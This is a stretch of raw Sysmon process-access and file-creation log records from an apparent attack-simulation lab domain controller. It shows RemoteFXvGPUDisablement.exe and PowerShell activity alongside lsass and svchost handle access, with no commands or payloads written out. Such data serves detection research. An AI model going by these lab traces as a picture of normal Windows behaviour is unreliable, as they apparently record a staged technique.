08:41:08.933{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-16A2-5F84-1C00-000000007F01}2228C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000995Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:08.840{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-16A2-5F84-1800-000000007F01}2128C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000994Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:08.840{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-16A2-5F84-1900-000000007F01}2204C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000993Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:08.840{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-16A2-5F84-1800-000000007F01}2128C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000992Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:08.840{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-16A2-5F84-1900-000000007F01}2204C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 11241100x8000000000000000991Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:07.996{5D479F2C-16A2-5F84-1C00-000000007F01}2228C:\Windows\System32\RemoteFXvGPUDisablement.exeC:\Windows\Temp\__PSScriptPolicyTest_n3heiei2.3pw.ps12020-10-12 08:41:07.996 11241100x8000000000000000990Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:07.934{5D479F2C-16A2-5F84-1900-000000007F01}2204C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_mgvtdjw0.43w.ps12020-10-12 08:41:07.934 11241100x8000000000000000989Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:07.934{5D479F2C-16A2-5F84-1800-000000007F01}2128C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_ezss3jag.wr2.ps12020-10-12 08:41:07.934 10341000x8000000000000000988Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:07.762{5D479F2C-16A1-5F84-1200-000000007F01}12081484C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|c:\windows\system32\es.dll+118e5|c:\windows\system32\es.dll+13b72|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+7d09|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be 10341000x8000000000000000987Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:07.762{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1fb7a|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+178ce|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000986Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:07.762{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1fb7a|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+178ce|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000985Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:07.746{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000984Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:07.746{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000983Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:07.746{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000982Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:07.433{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A2-5F84-1800-000000007F01}2128C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000981Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:07.433{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A2-5F84-1900-000000007F01}2204C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000980Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.621{5D479F2C-16A2-5F84-2100-000000007F01}24442484C:\Windows\system32\conhost.exe{5D479F2C-16A2-5F84-1C00-000000007F01}2228C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000979Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.621{5D479F2C-16A2-5F84-1B00-000000007F01}22202488C:\Windows\system32\conhost.exe{5D479F2C-16A2-5F84-1900-000000007F01}2204C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000978Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.621{5D479F2C-16A2-5F84-1A00-000000007F01}22122476C:\Windows\system32\conhost.exe{5D479F2C-16A2-5F84-1800-000000007F01}2128C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000977Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.621{5D479F2C-16A2-5F84-1F00-000000007F01}23042480C:\Windows\system32\conhost.exe{5D479F2C-16A2-5F84-1E00-000000007F01}2284C:\Windows\system32\compattelrunner.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000976Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.574{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-16A2-5F84-2000-000000007F01}2376C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000975Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.574{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-16A2-5F84-2000-000000007F01}2376C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000974Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.512{5D479F2C-169F-5F84-0500-000000007F01}648796C:\Windows\system32\csrss.exe{5D479F2C-16B1-5F84-2E00-000000007F01}2444C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000973Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.465{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000972Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.465{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000971Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.465{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000970Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.465{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000969Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:06.465{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000968Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 